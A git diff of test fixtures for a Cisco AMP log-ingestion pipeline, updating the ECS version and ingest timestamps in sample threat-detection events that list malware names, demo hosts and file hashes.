Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2758,7 +2758,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2786,7 +2786,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469670637Z",
+                "ingested": "2021-09-13T18:06:41.546145982Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2843,7 +2843,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2871,7 +2871,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469672538Z",
+                "ingested": "2021-09-13T18:06:41.546148086Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2928,7 +2928,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2950,7 +2950,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469674438Z",
+                "ingested": "2021-09-13T18:06:41.546150194Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3007,7 +3007,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3029,7 +3029,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469676331Z",
+                "ingested": "2021-09-13T18:06:41.546152267Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3086,7 +3086,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3108,7 +3108,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469678203Z",
+                "ingested": "2021-09-13T18:06:41.546154327Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3174,7 +3174,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3206,7 +3206,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469680172Z",
+                "ingested": "2021-09-13T18:06:41.546156486Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3267,7 +3267,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3299,7 +3299,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469682061Z",
+                "ingested": "2021-09-13T18:06:41.546158553Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3356,7 +3356,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3384,7 +3384,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469683932Z",
+                "ingested": "2021-09-13T18:06:41.546160597Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3441,7 +3441,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3469,7 +3469,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469685813Z",
+                "ingested": "2021-09-13T18:06:41.546162684Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3526,7 +3526,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3548,7 +3548,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469687673Z",
+                "ingested": "2021-09-13T18:06:41.546164735Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3606,7 +3606,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3626,7 +3626,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:04.469689561Z",
+                "ingested": "2021-09-13T18:06:41.546166865Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-15T10:17:41.000Z",
@@ -3686,7 +3686,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3708,7 +3708,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469691446Z",
+                "ingested": "2021-09-13T18:06:41.546168922Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3765,7 +3765,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3791,7 +3791,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:04.469693323Z",
+                "ingested": "2021-09-13T18:06:41.546175169Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
similarity index 97%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
index fb0cb6dbbed..bcf087a5dee 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json
@@ -12,7 +12,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -34,7 +34,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581709368Z",
+                "ingested": "2021-09-13T18:06:53.271886158Z",
